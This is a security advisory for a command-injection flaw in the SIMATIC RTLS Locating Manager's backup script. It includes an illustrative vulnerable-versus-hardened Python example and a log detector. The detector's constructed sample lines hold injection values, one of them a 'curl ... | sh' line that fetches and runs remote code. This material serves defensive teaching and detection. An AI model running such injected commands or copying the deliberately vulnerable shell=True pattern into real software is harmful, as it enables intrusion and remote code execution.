CVE-2025-40746
A vulnerability has been identified in SIMATIC RTLS Locating Manager (Multiple Products)
Executive summary
A critical vulnerability has been identified in the SIMATIC RTLS Locating Manager, which could allow an authenticated attacker to compromise the system. The flaw stems from improper input validation within a backup script, potentially leading to remote code execution. Successful exploitation could result in a complete loss of control over the locating system, disrupting industrial operations and posing a significant security risk.
Vulnerability
The vulnerability exists because the backup script in the SIMATIC RTLS Locating Manager does not properly validate or sanitize user-supplied input before passing it to the command that performs the backup. An authenticated remote attacker can therefore supply input containing shell metacharacters followed by arbitrary commands. When the backup is initiated, the injected commands are executed on the underlying server with the privileges of the Locating Manager service, giving the attacker remote code execution. The authentication requirement limits exposure to accounts that can trigger a backup, but a single compromised or over-privileged account with that access is sufficient.
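To make the class of bug concrete, the following is an added, illustrative example (not the SIMATIC RTLS Locating Manager's backup script, whose internals are not published on this page). It shows the vulnerable pattern the advisory describes, a backup name interpolated into a shell command line, next to a hardened version that allowlists the name and passes it as a discrete argument without a shell. The backup directory, the use of `echo` as a stand-in for the real archiving tool, and the function names are assumptions chosen so the code runs harmlessly anywhere.

```python
"""Command injection in a backup handler: vulnerable pattern and hardened form.

Illustrative code only, not the product's backup script. `echo` stands in for
the real archiving command so the example is safe to run.
"""
import re
import subprocess
from pathlib import PurePosixPath

# Assumed backup location; illustrative, not taken from the product.
BACKUP_DIR = PurePosixPath("/var/backups/rtls")

# Allowlist: letters, digits, '_' and '-', 1..64 chars, starting alphanumeric.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")


def backup_vulnerable(backup_name: str) -> str:
    """Vulnerable: builds one command string and hands it to the shell.

    Any shell metacharacter in backup_name (; | & $( ` ...) is interpreted by
    the shell, so the caller controls what gets executed.
    """
    cmd = f"echo archiving to {BACKUP_DIR}/{backup_name}.tar.gz"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def validate_backup_name(backup_name: str) -> str:
    """Reject anything outside the allowlist instead of trying to escape it."""
    if not SAFE_NAME.fullmatch(backup_name):
        raise ValueError(f"rejected backup name: {backup_name!r}")
    return backup_name


def backup_hardened(backup_name: str) -> str:
    """Hardened: validate first, then run argv without a shell.

    Even if validation were bypassed, the name is a single argv element, so
    the operating system never parses it as a command.
    """
    name = validate_backup_name(backup_name)
    target = BACKUP_DIR / f"{name}.tar.gz"
    argv = ["echo", "archiving to", str(target)]
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    payload = "site1; echo INJECTED"          # constructed attacker input
    print("vulnerable:", repr(backup_vulnerable(payload)))
    try:
        backup_hardened(payload)
    except ValueError as exc:
        print("hardened:", exc)
    print("hardened, benign:", repr(backup_hardened("site1")))
```

The injected `echo INJECTED` in the vulnerable path runs as a second command; the hardened path refuses the same input before any process is spawned, and for a benign name produces the single expected command with the name confined to one argument.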
Business impact
This vulnerability is rated as critical severity with a CVSS score of 9.1, reflecting the high potential for significant business disruption. Successful exploitation could allow an attacker to take complete control of the SIMATIC RTLS Locating Manager. This could lead to the manipulation or theft of real-time location data, disruption of critical industrial processes that rely on this data, and potential operational downtime. For an organization, this translates to risks of production loss, safety incidents in the operational environment, and a potential pivot point for attackers to move deeper into the industrial control network.
Remediation
Immediate Action: Update all instances of SIMATIC RTLS Locating Manager to version 3.2 or later to patch the vulnerability. Because the update closes the injection point but does not remove a foothold an attacker may already have established, review system and access logs for unauthorized access or anomalous backup invocations that preceded the patch, and continue to monitor for signs of post-exploitation activity afterwards.
Proactive Monitoring: Implement enhanced logging and monitoring focused on the affected systems. Specifically, look for shell metacharacters (such as `;`, `|`, `&`, `$(`, backticks) or unexpected file paths in the arguments logged for the backup script's execution, and for child processes spawned by the backup script that are not the expected archiving tool. Monitor for unexpected network connections originating from the Locating Manager server and alert on any modifications to critical system files or the creation of unauthorized user accounts.
Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:
- Restrict network access to the management interface of the SIMATIC RTLS Locating Manager to a limited set of trusted administrative workstations.
- Apply stricter access control policies, ensuring that only highly trusted users have the permissions required to initiate the backup function.
- Deploy an Intrusion Detection/Prevention System (IDS/IPS) with rules to detect and block command injection attempts against the application.
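As an added example of the "Proactive Monitoring" item above (not code from the vendor or this advisory), the script below scans backup-request log lines for names that fall outside a strict allowlist or carry shell metacharacters. The log format is a constructed key=value layout, the sample lines are constructed, and the IP address is from a documentation range; adapt the regex to the real backup-script log lines once their shape is known.

```python
"""Flag backup requests whose user-supplied name looks like command injection.

Added detection example. The log layout and sample lines are constructed,
not captured from a SIMATIC RTLS Locating Manager installation.
"""
import re
from typing import List, NamedTuple, Optional

# Constructed sample log (not real data). Lines 2, 3 and 5 are malicious.
SAMPLE_LOG = """\
2025-08-12T10:15:02Z INFO backup requested user="svc_admin" name="plant1_nightly"
2025-08-12T10:15:40Z INFO backup requested user="svc_admin" name="plant1_nightly; curl http://198.51.100.7/x.sh|sh"
2025-08-12T10:16:11Z INFO backup requested user="operator2" name="test & whoami"
2025-08-12T10:17:05Z INFO backup requested user="svc_admin" name="line2-2025-08-12"
2025-08-12T10:18:30Z INFO backup requested user="operator2" name="$(id)"
"""

# Assumed log shape: <timestamp> <level> backup requested user="..." name="..."
LOG_RE = re.compile(
    r'^(?P<ts>\S+) \S+ backup requested user="(?P<user>[^"]*)" name="(?P<name>.*)"$'
)
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")
# Characters with meaning to sh, cmd.exe or PowerShell when interpolated.
SHELL_META = set(";|&$`<>(){}\\'\"%^\n")


class Finding(NamedTuple):
    ts: str
    user: str
    name: str
    reason: str


def check_line(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious backup request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None                     # not a backup request line
    name = m["name"]
    if SAFE_NAME.fullmatch(name):
        return None                     # within allowlist, nothing to flag
    meta = sorted(SHELL_META & set(name))
    reason = (f"shell metacharacters {''.join(meta)!r}" if meta
              else "name outside allowlist")
    return Finding(m["ts"], m["user"], name, reason)


def suspicious_backup_requests(log_text: str) -> List[Finding]:
    """Run check_line over every line and collect the findings."""
    return [f for f in map(check_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in suspicious_backup_requests(SAMPLE_LOG):
        print(f"{f.ts} user={f.user} {f.reason}: {f.name!r}")
```

Because the allowlist check runs first, an attacker cannot evade the detector by avoiding the specific metacharacter list; anything that is not a plain identifier is reported, and the metacharacter list only serves to make the reason more specific. Pair this with alerts on unexpected child processes of the backup script, which catch injection the log line itself does not record.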
Exploitation status
Public Exploit Available: false
Analyst recommendation
Given the critical CVSS score of 9.1 and the potential for severe operational impact within an industrial environment, this vulnerability presents a significant risk. We strongly recommend that the organization prioritize the immediate patching of all affected SIMATIC RTLS Locating Manager instances to version 3.2 or newer. If patching must be delayed, the compensating controls listed above should be implemented without delay to reduce the attack surface and mitigate the immediate risk of exploitation.